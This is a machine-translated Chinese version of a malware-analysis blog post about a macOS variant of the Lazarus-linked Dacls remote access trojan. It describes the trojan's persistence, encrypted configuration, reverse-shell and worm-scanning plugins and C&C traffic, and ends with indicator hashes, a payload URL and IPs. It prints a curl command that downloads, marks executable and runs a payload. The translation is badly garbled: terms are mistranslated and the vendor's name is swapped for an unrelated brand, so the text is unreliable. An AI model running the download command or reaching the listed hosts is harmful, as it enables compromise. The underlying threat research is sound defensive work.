这篇博客由Hossein Jazi, Thomas Reed和Jérôme Segura撰写。

最近,我们发现了一种名为dacks远程访问木马(RAT)的新变种,它与朝鲜的Lazarus组织有关,是专门为Mac操作系统设计的。

达克斯是一只老鼠,是被Qihoo 360 Netlab.作为一种针对Windows和Linux平台的全功能隐蔽远程访问木马。

这个Mac版本至少是通过一个名为MinaOTP的木马双因素认证应用程序发布的,该应用程序主要由中文用户使用。与Linux版本类似,它拥有多种功能,包括命令执行、文件管理、流量代理和蠕虫扫描。

发现

4月8日,一个可疑的Mac应用程序“TinkaOTP”出现了提交给Virustotal.来自香港。当时没有任何引擎探测到它。

恶意机器人可执行文件位于“内容/资源/基础”中。lproj/ "目录,假装是一个nib文件(" SubMenu.nib "),而它是一个Mac可执行文件。它包含字符串“c_2910”。cls”和“k_3872。,这是之前观察到的证书和私钥文件的名称。

持久性

这只大鼠通过Launchedaemons或Launchagents持续,该Launchagents占用属性列表(Plist)文件,该文件指定重新引导后需要执行的应用程序。Laungents和LaunchDaemons之间的差异是Launchagents代表登录用户运行代码,而Launchdaemon运行代码作为root用户。

当恶意应用程序启动时,它会用“com.aex-loop.agent.”创建一个plist文件。在“Library/LaunchDaemons”目录下。plist文件的内容是在应用程序中硬编码的。

程序还检查" getpwuid(getuid()) "是否返回当前进程的用户id。如果返回用户id,它将创建plist文件“com.aex-loop.agent.”在LaunchAgents目录下:“Library/LaunchAgents/”。

图1:Plist文件

存储plist的文件名和目录是十六进制格式,并被追加在一起。它们向后显示文件名和目录。

图2:目录和文件名的生成

配置文件

配置文件包含有关受害者机器的信息,如Puid、Pwuid、插件和C&C服务器。配置文件内容采用AES加密算法加密。

图3:加载配置

Mac和Linux的变体都使用相同的AES密钥和IV加密和解密配置文件。两种变体的AES模式都是CBC。

图4:AES密钥和IV

配置文件的位置和名称以十六进制格式存储在代码中。配置文件的名称假装是一个与苹果商店相关的数据库文件:

“图书馆/缓存/ Com.apple.appstore.db”

图5:配置文件名

“initialize econfiguration”函数用以下硬编码的C&C服务器初始化配置文件。

图6:初始化配置文件

通过接收来自C&C服务器的命令,配置文件会不断更新。安装后的应用程序名称为“mina”。米娜来自MinaOTP这是一个双因素认证应用程序的macOS。

图7:配置文件正在被更新

主循环

初始化配置文件后,执行主循环,执行以下四个主要命令:

  • 将C&C服务器信息从配置文件从配置文件上传到服务器(0x601)
  • 从服务器下载配置文件内容并更新配置文件(0x602)
  • 通过调用" getbasicinfo "函数从受害者的机器上上传收集到的信息(0x700)
  • 发送心跳信息(0x900)

命令代码与“Linux.dacls”完全相同。

图8:主循环

插件

此Mac Rat具有在Linux变体中看到的所有六个插件,其中包含一个名为“袜子”的附加插件。此新插件用于从受害者到C&C服务器的网络流量。

应用程序在主循环开始时加载所有七个插件。每个插件在配置文件中都有自己的配置部分,该配置部分将在插件初始化时加载。

图9:加载的插件

CMD插件

cmd插件类似于Linux rat中的“bash”插件,它通过向C&C服务器提供一个反向shell来接收和执行命令。

图10:Cmd插件

文件的插件

文件插件能够读取、删除、下载和搜索目录中的文件。Mac和Linux版本之间的唯一区别是Mac版本没有写文件的能力(Case 0)。

图11:文件插件

过程插件

进程插件有杀死、运行、获取进程ID和收集进程信息的能力。

图12:处理插件

如果可以访问进程的" /proc/%d/task "目录,插件会从该进程获取以下信息,其中%d是进程ID:

  • 通过执行“/ proc /%/ cmdline”进程的命令行参数
  • 名称,UID,GID,“/ proc /%d / status”文件的过程的ppid。

测试插件

Mac和Linux版本的Test插件的代码是相同的。它检查与C&C服务器指定的IP和端口的连接。

RP2P插件

RP2P插件是一个代理服务器,用于避免从受害者到参与者的基础设施的直接通信。

图13:反向P2P

LogSend插件

logsend插件包含三个:

  • 检查与日志服务器的连接
  • 扫描网络(蠕虫扫描仪模块)
  • 执行长运行系统命令
图14:Logsend Plugin

此插件使用HTTP POST请求发送收集的日志。

图15:User Agent

这个插件中一个有趣的功能是蠕虫扫描器。start_worm_scan可以扫描端口8291或8292上的网络子网。要扫描的子网是根据一组预定义规则确定的。下图显示了选择要扫描的子网的过程。

图16:蠕虫扫描

袜子插件

袜子插件是添加到此MAC RAT的新的第七插件。它类似于RP2P插件,并充当中介,以引导BOT和C&C基础设施之间的流量。它使用Socks4进行代理通信。

图17:Socks4

网络通信

这个Mac RAT软件使用的C&C通信类似于Linux的变体。要连接到服务器,应用程序首先建立一个TLS连接,然后执行信标,最后使用RC4算法对通过SSL发送的数据进行加密。

图18:应用程序生成的流量(.mina)
图19:TLS连接

Mac和Linux版本都使用WolfSSL库进行SSL通信。WolfSSL是C语言中TLS的开源实现,支持多个平台。该库已被几个威胁行为者使用。例如,《热带部队》在其Keyboys恶意软件。

图20:WOLFSSL

用于信标的命令代码与Linux.dacls中的命令代码相同。这是为了确认机器人和服务器的身份。

图21:Beconing

RC4密钥是使用硬编码密钥生成的。

图22:RC4初始化

变异和检测

我们还发现了这种RAT的另一种变体,它使用以下curl命令下载恶意负载:

-k -o ~/Library/。chmod +x ~/ dev/null 2 /dev/null 2 /dev/null 2 /dev/null 2 /dev/null 2 /dev/null/dev/null 2 && ~/Library/。米娜> / dev

我们认为,该DCals大鼠的MAC变异与拉撒库组有关,也称为隐藏眼镜蛇,APT 38,自2009年以来一场臭名昭着的朝鲜威胁演员进行网络间谍活动和网络犯罪行动。

该组被称为最复杂的演员之一,能够使自定义恶意软件进行定制不同的平台。该MAC RAT的发现表明,此APT组不断开发其恶意软件工具集。

必威平台APPMARWARYTES用于MAC检测此远程管理Trojan作为OSX-DACLSRAT。

国际石油公司

899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6 216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd
loneeaglerecords com/wp-content/uploads/2020/01/images.tgz.001。
67.43.239.146 185.62.58.207 50.87.144.227